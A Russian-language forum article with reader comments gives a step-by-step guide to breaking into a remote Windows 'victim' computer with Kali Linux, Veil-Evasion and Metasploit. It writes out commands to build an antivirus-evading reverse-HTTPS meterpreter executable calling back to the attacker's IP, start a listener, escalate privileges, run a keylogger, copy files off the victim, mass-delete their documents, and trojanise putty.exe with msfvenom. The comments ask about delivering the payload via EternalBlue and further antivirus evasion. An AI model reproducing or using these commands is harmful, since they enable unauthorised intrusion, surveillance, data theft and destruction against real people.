Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

Elektrolife

Green Team
21.10.2016
208
33
BIT
25
Скорее всего это и есть сценарий RC, о нем писал выше. А для полного автоматизма со своими задачами только если писать модуль самостоятельно.

Немного углубился в тему :) Вы абсолютно правы,для хорошей автоматизации нужны познания в программировании. Отсюда вытекает закономерный вопрос: Ruby или Python ? Либо вообще C# ? Что проще в освоении для новичка ? Есть ли какие то стоящие пособия,где доступно написано ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Отсюда вытекает закономерный вопрос: Ruby или Python ? Либо вообще C# ? Что проще в освоении для новичка ? Есть ли какие то стоящие пособия,где доступно написано ?

Метаслплоит на руби написан. На чем писать дело каждого. Что проще - это не верный подход, нужно определиться на чем будет эффективнее писать и больше пользы. Новички разные - одним С как сказка Пушкина - легко, красиво, ясно, иным Python.
 
  • Нравится
Реакции: forgot
F

forgot

Спасибо за статью! Все информативно и понятно !
 
I

IioS

Первый раз такое что стандартные команды Ненайдены, и да почему я отображаюсь как локал хост?

Снимок экрана от 2017-09-19 19-05-26.png
 
S

Spider_fido

А нормально что при установке Veil ставиться виндовый python?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
А нормально что при установке Veil ставиться виндовый python?

нормально. Посмотрите технологию работы и все сами поймете.
[doublepost=1507818656,1507818532][/doublepost]
Первый раз такое что стандартные команды Ненайдены, и да почему я отображаюсь как локал хост?

Судя по всему с сеткой что то пошло не так, отсюда и связи нормальной нет, и команду не находит потому что не запустился протокол в полном объеме.
 
M

MadRat

Возникли проблемы при запуске, а именно, когда пишу в терминале veil выводит вот это. И еще, теперь появилась такая проблема (скрин на котором идет генерация)
 

Вложения

  • VirtualBox_kali_29_10_2017_22_08_37.png
    VirtualBox_kali_29_10_2017_22_08_37.png
    145 КБ · Просмотры: 165
  • VirtualBox_kali_29_10_2017_22_28_32.png
    VirtualBox_kali_29_10_2017_22_28_32.png
    95,7 КБ · Просмотры: 179
Последнее редактирование модератором:
H

Home2601

Возникли проблемы при запуске, а именно, когда пишу в терминале veil выводит вот это. И еще, теперь появилась такая проблема (скрин на котором идет генерация)
То же тестил ,получаю такую ошибку.Решить пока проблему не смог(Может есть у кого на форуме идеи?
 
P

pisun

Файрволл отключать нужно на атакующей машине?
 

adm2

Green Team
05.07.2017
50
120
BIT
0
Возникли проблемы при запуске, а именно, когда пишу в терминале veil выводит вот это. И еще, теперь появилась такая проблема (скрин на котором идет генерация)

Самый простой способ запустить из каталога установки
Код:
cd Veil/
./Veil.py
Либо можно ещё настроить алиасы, но как правило это редко (никому) почти не нужно и для начала вполне хватит и этого варианта
 

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
202
Не забываем что veil обновился! Мануал уже не совсем актуален. Но в целом написано не плохо.
 
K

kolibomber

У меня x64 версия постоянно вылетает с ошибкой на Windows 10

Имя сбойного приложения: veil_64.exe, версия: 0.0.0.0, метка времени: 0x00000000
Имя сбойного модуля: unknown, версия: 0.0.0.0, метка времени: 0x00000000
Код исключения: 0xc0000005
Смещение ошибки: 0x028300df
Идентификатор сбойного процесса: 0x2bb8
Время запуска сбойного приложения: 0x01d35c7915775571
Путь сбойного приложения: C:\Users\admin\Documents\Kali\veil_64.exe
Путь сбойного модуля: unknown
Идентификатор отчета: 36f438b5-6879-4cca-b1b5-5c5b922e0bd7
Полное имя сбойного пакета:
Код приложения, связанного со сбойным пакетом:
 
R

re01ashen

Может кто-нибудь скрытые команды скинуть?
 
V

Vasiliy 2.0

Все проверил, все работает! Уязвимость закрыл! Автору огромное спасибо!
 
F

frik

Ребят, подскажите пожалуйста, порт 4444 он по дефолту открыт и как проверит его открытость?
 

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Vander, спасибо за актуальную тему(как раз обновление Veil).

Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Интересует доставка полученного файла на компьютер жертвы средствами Metasploit...

Как я себе это представляю:
  1. Генерирую payload в Veil так как это описано у Вас в статье. На выходе получаю файл, скажем, eggs.exe.
  2. Затем в msf выбираю эксплоит (к примеру eternalblue, для натуральности), у которого в OPTIONS есть параметр PAYLOADS.
Вопрос 1: Каким образом прикрутить полученный eggs.exe к нашему эксплоиту? В голове все смешалось...
  • получившийся payload - в .exe
  • сам эксплоит собирает payload-ы в - .dll
Вопрос 2: Какие (помимо нового Veil) есть актуальные способы обфускации нагрузки и обхода АВ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!